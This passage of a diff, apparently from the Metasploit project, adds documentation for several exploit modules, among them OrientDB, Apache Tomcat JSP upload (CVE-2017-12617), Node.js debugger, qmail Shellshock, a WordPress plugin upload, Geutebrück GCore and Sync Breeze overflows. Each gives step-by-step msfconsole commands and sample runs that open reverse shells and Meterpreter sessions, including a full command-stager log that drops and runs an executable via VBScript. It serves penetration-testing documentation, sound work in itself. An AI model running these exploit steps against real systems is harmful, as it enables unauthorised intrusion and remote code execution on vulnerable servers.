2 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2 10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2)
msf post(shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer : 10.10.10.2
OS : Ubuntu 16.04 (Linux 4.10.0-35-generic)
Architecture : x64
Meterpreter : x86/linux
```

View File

@ -0,0 +1,91 @@
This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
All versions from 2.2.2 up to 2.2.22 should be vulnerable.
The module is based on the public PoC found here: [securiteam](https://blogs.securiteam.com/index.php/archives/3318)
## Vulnerable Application
OrientDB 2.2.2 <= 2.2.22
## Installation
Download a vulnerable OrientDB version here: [orientdb](http://orientdb.com/download-previous/)
```
wget http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi
unzip orientdb-community-2.2.20.zip
chmod 755 bin/*.sh
chmod -R 777 config
cd bin
./server.sh
```
## References for running OrientDB
[Install](http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html)
[Run](http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html)
## References for vulnerability
[securiteam](https://blogs.securiteam.com/index.php/archives/3318)
[palada](http://www.palada.net/index.php/2017/07/13/news-2112/)
[github](https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017)
## Verification Steps
1. Start `msfconsole`
2. `use exploit/multi/http/orientdb_exec`
3. `set rhost <RHOST>`
4. `set target <TARGET_NUMBER>`
5. `set workspace <WORKSPACE>`
6. `check`
7. **Verify** if the OrientDB instance is vulnerable
8. `run`
9. **Verify** you get a session
## Example Output
### OrientDB 2.2.20 on Windows XP
```
msf > use exploit/multi/http/orientdb_exec
msf exploit(orientdb_exec) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(orientdb_exec) > set target 2
target => 2
msf exploit(orientdb_exec) > check
[+] Version: OrientDB Server v.2.2.20 (build 76ab59e72943d0ba196188ed100c882be4315139)
[+] 2.2.2.2:2480 The target is vulnerable.
msf exploit(orientdb_exec) > set verbose true
verbose => true
msf exploit(orientdb_exec) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:2480 - Sending command stager...
[*] Attempting to execute: echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAWNfbSQAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAAByMQAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\aAqsZ.b64
[*] Command Stager progress - 2.01% done (2046/101881 bytes)
[*] Attempting to execute: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\aAqsZ.b64
[*] Command Stager progress - 4.02% done (4092/101881 bytes)
```
...snip...
```
[*] Attempting to execute: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\aAqsZ.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%TEMP%\uFLQh.vbs & echo Set file = fs.GetFile("%TEMP%\aAqsZ.b64") >>%TEMP%\uFLQh.vbs & echo If file.Size Then >>%TEMP%\uFLQh.vbs & echo Set fd = fs.OpenTextFile("%TEMP%\aAqsZ.b64", 1) >>%TEMP%\uFLQh.vbs & echo data = fd.ReadAll >>%TEMP%\uFLQh.vbs & echo data = Replace(data, vbCrLf, "") >>%TEMP%\uFLQh.vbs & echo data = base64_decode(data) >>%TEMP%\uFLQh.vbs & echo fd.Close >>%TEMP%\uFLQh.vbs & echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%TEMP%\tIzcO.exe", 2, True) >>%TEMP%\uFLQh.vbs & echo ofs.Write data >>%TEMP%\uFLQh.vbs & echo ofs.close >>%TEMP%\uFLQh.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%TEMP%\uFLQh.vbs
[*] Command Stager progress - 98.40% done (100252/101881 bytes)
[*] Attempting to execute: echo shell.run "%TEMP%\tIzcO.exe", 0, false >>%TEMP%\uFLQh.vbs & echo Else >>%TEMP%\uFLQh.vbs & echo Wscript.Echo "The file is empty." >>%TEMP%\uFLQh.vbs & echo End If >>%TEMP%\uFLQh.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\uFLQh.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\uFLQh.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\uFLQh.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\uFLQh.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\uFLQh.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\uFLQh.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\uFLQh.vbs & echo If Not w2 Then _ >>%TEMP%\uFLQh.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\uFLQh.vbs & echo If Not w3 Then _ >>%TEMP%\uFLQh.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\uFLQh.vbs & echo If Not w4 Then _ >>%TEMP%\uFLQh.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\uFLQh.vbs & echo Next >>%TEMP%\uFLQh.vbs & echo base64_decode = strOut >>%TEMP%\uFLQh.vbs & echo End Function >>%TEMP%\uFLQh.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\uFLQh.vbs & echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%TEMP%\uFLQh.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\uFLQh.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\uFLQh.vbs & echo Else >>%TEMP%\uFLQh.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\uFLQh.vbs & echo End If >>%TEMP%\uFLQh.vbs & echo End Function >>%TEMP%\uFLQh.vbs & cscript //nologo %TEMP%\uFLQh.vbs & del %TEMP%\uFLQh.vbs & del %TEMP%\aAqsZ.b64
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (956991 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:1422) at 2017-10-06 14:00:14 -0400
meterpreter > sysinfo
Computer : WINXP
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : GROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```

View File

@ -0,0 +1,53 @@
## Description
This module uses a PUT request bypass to upload a jsp shell to a vulnerable Apache Tomcat configuration.
## Vulnerable Application
When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialization parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617
To set up a vulnerable installation:
1. Download and install an affected version of Apache Tomcat.
2. Download and install Java. [Choose an appropriate version](http://tomcat.apache.org/whichversion.html) based on the Apache Tomcat version you downloaded.
3. In conf directory of Apache Tomcat, edit the web.xml file and set the "readonly" parameter to false for the default servlet.
4. Restart the Tomcat service.
## Verification Steps
1. Do: ```use exploit/multi/http/tomcat_jsp_upload_bypass```
1. Do: ```set payload java/jsp_shell_bind_tcp```
2. Do: ```set RHOST [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```check```
5. It should be reported as vulnerable
6. Do: ```run```
7. You should get a shell
## Scenarios
```
msf > use exploit/multi/http/tomcat_jsp_upload_bypass
msf exploit(tomcat_jsp_upload_bypass) > set payload java/jsp_shell_bind_tcp
payload => java/jsp_shell_bind_tcp
msf exploit(tomcat_jsp_upload_bypass) > set RHOST 10.10.40.93
RHOST => 10.10.40.93
msf exploit(tomcat_jsp_upload_bypass) > set RPORT 8080
RPORT => 8080
msf exploit(tomcat_jsp_upload_bypass) > check
[+] 10.10.40.93:8080 The target is vulnerable.
msf exploit(tomcat_jsp_upload_bypass) > run
[*] Started bind handler
[*] Uploading payload...
[*] Payload executed!
[*] Command shell session 1 opened (10.10.230.230:39979 -> 10.10.40.93:4444) at 2017-10-11 07:43:08 -0400
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files\apache-tomcat-7.0.81>whoami
whoami
nt authority\system
```

View File

@ -0,0 +1,64 @@
## Vulnerable Application
Current and historical versions of node (or any JS env based on the
V8 JS engine) have this functionality and could be exploitable if
configured to expose the JS port on an untrusted interface.
Install a version of node using any of the normal methods:
* Vendor: https://nodejs.org/en/download/package-manager/
* Distro: `sudo apt-get install nodejs`
Alternately, use standard node docker containers as targets:
```
$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858
```
(Others at https://hub.docker.com/_/node/)
Tested on Node 7.x, 6.x, 4.x
## Verification Steps
1. Run a node process exposing the debug port
```
node --debug=0.0.0.0:5858
```
2. Exploit it and catch the callback:
```
msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit
```
(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)
Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity
(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.
## Scenarios
### Example Run (Node 7.x)
Victim:
```
$ node --version
v7.10.0
$ node --debug=0.0.0.0:5858
(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
Debugger listening on 0.0.0.0:5858
>
(To exit, press ^C again or type .exit)
```
Attacker:
```
msf exploit(nodejs_v8_debugger) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 127.0.0.1:5858 - Sending 745 byte payload...
[*] 127.0.0.1:5858 - Got success response
[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
id
(redacted)
```

View File

@ -0,0 +1,82 @@
## Vulnerable Application
Any qmail version (works on latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.
## Setting up a vulnerable environment
Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd.
## Verification Steps
1. `use exploit/unix/smtp/qmail_bash_env_exec`
2. `set RHOST <target IP>`
3. `set MAILTO <valid e-mail recipient>`
4. `set payload cmd/unix/reverse`
5. `set LHOST <local IP>`
7. optionally set `RPORT` and `LPORT`
8. `exploit`
9. **Verify** a new shell session is started
## Options
**MAILTO**
A valid e-mail recipient. Usually, admin@targetdomain.com can be used.
## Sample Output
**Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).**
```
msf > use exploit/unix/smtp/qmail_bash_env_exec
msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113
rhost => 192.168.1.113
msf exploit(qmail_bash_env_exec) > set mailto "admin@testqmail2.test"
mailto => admin@testqmail2.test
msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(qmail_bash_env_exec) > show options
Module options (exploit/unix/smtp/qmail_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILTO admin@testqmail2.test yes TO address of the e-mail
RHOST 192.168.1.113 yes The target address
RPORT 25 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.102 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(qmail_bash_env_exec) > run
[*] Started reverse TCP double handler on 192.168.1.102:4444
[*] 192.168.1.113:25 - Sending the payload...
[*] 192.168.1.113:25 - Sending RCPT TO admin@testqmail2.test
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RvZfov9i2ZuveLXA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RvZfov9i2ZuveLXA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200
whoami
vpopmail
```

View File

@ -0,0 +1,63 @@
## Vulnerable Application
wp-mobile-detector is a wordpress plugin which was removed from the wordpress site after this vulnerability
was disclosed. Version 3.5 and earlier can be directed to upload a file from a remote web server, and then
the file can be executed by the client.
Download [wp-mobile-detector](https://www.exploit-db.com/apps/bf8bdbac0b01e14788aa2d4a0d9c6971-wp-mobile-detector.3.5.zip)
from Exploit-db since wordpress removed it.
Due to its age, it may be difficult to install. The install for the scenario later is:
* Ubuntu 16.04.2
* Apache 2.4.18
* PHP 7
* Wordpress 4.4.2
## Verification Steps
Example steps in this format (is also in the PR):
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/unix/webapp/wp_mobile_detector_upload_execute```
4. Do: ```set rhost [ip]```
5. Do: ```set lhost [ip]```
6. Do: ```set srvhost [ip]```
7. Do: ```exploit```
8. You should get a shell.
## Scenarios
### wp-mobile-detector 3.5 on Wordpress 4.4.2
```
msf > use exploit/unix/webapp/wp_mobile_detector_upload_execute
msf exploit(wp_mobile_detector_upload_execute) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(wp_mobile_detector_upload_execute) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_mobile_detector_upload_execute) > check
[*] 2.2.2.2:80 The target appears to be vulnerable.
msf exploit(wp_mobile_detector_upload_execute) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
smsf exploit(wp_mobile_detector_upload_execute) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(wp_mobile_detector_upload_execute) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf exploit(wp_mobile_detector_upload_execute) > exploit
[*] Exploit running as background job 2.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(wp_mobile_detector_upload_execute) > [*] Starting Payload Server
[*] Using URL: http://1.1.1.1:8080/ZWTgqwsiFL.php
[*] Uploading payload via /wordpress/wp-content/plugins/wp-mobile-detector/resize.php?src=http://1.1.1.1:8080/ZWTgqwsiFL.php
[+] Payload requested on server, sending
[+] Sleeping 5 seconds for payload upload
[*] Executing the payload via /wordpress/wp-content/plugins/wp-mobile-detector/cache/ZWTgqwsiFL.php
[*] Sending stage (37514 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:47064) at 2017-10-20 22:54:04 -0400
[+] Deleted ZWTgqwsiFL.php
[*] Server stopped.
```

View File

@ -0,0 +1,69 @@
## Vulnerable Application
Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation.
Since this application is started with system privileges this allows a system remote code execution.
## Verification Steps
1. Install Windows as basic OS (Tested with Win2012R2, Windows 7)
2. Install the Geutebrück GCore server
3. Verify that http://<your target ip>:13003/statistics/runningmoduleslist.xml available is.
4. Start msfconsole
5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]```
6. Do: ```set rhost <your target ip>```
7. Do: ```set rport 13003```
8. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
9. Do: ```exploit```
10. You should get a shell as NT/SYSTEM.
## Scenarios
### Geutebrueck GCore 1.4.2.37
```
msf exploit(geutebrueck_gcore_x64_rce_bo) > show options
Module options (exploit/windows/http/geutebrueck_gcore_x64_rce_bo):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.10 yes The target address
RPORT 13003 yes The target port
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.11 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit
[*] Started reverse TCP handler on 192.168.1.11:4444
[*] 192.168.1.10:13003 - Trying to fingerprint server with http://192.168.1.10:13003/statistics/runningmoduleslist.xml...
[*] 192.168.1.10:13003 - Vulnerable version detected: GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)
[*] 192.168.1.10:13003 - Preparing ROP chain for target 1.4.2.37!
[*] 192.168.1.10:13003 - Crafting Exploit...
[*] 192.168.1.10:13003 - Exploit ready for sending...
[*] 192.168.1.10:13003 - Exploit sent! [*] Sending stage (1188415 bytes) to
[*] Meterpreter session 1 opened ( :4444 -> 49963) at 2017-11-03 13:14:51 +0200
[*] 192.168.1.10:13003 - Closing socket.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid Server username:
NT-AUTORITÄT\SYSTEM
meterpreter >
```
## Mitigation
Geutebrück released a new version and an update for the affected product which should be installed to fix the described vulnerabilities.

View File

@ -1,6 +1,6 @@
## Vulnerable Application
[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Sync Breeze Enterprise](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe).
[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 and v10.0.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerabilities are caused by improper bounds checking of the request path in HTTP GET requests and username value via HTTP POST requests sent to the built-in web server, respectively. This module has been tested successfully on Windows 7 SP1. The vulnerable applications are available for download at [Sync Breeze Enterprise v9.4.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe) and [Sync Breeze Enterprise v10.0.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe).
## Verification Steps
1. Install a vulnerable Sync Breeze Enterprise
@ -10,13 +10,14 @@
5. Check `Enable Web Server On Port 80` to start the web interface
6. Start `msfconsole`
7. Do `use exploit/windows/http/syncbreeze_bof`
8. Do `set RHOST ip`
9. Do `check`
10. Verify the target is vulnerable
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
12. Do `set LHOST ip`
13. Do `exploit`
14. Verify the Meterpreter session is opened
8. Select appropriate target via `set target 0` or `set target 1`
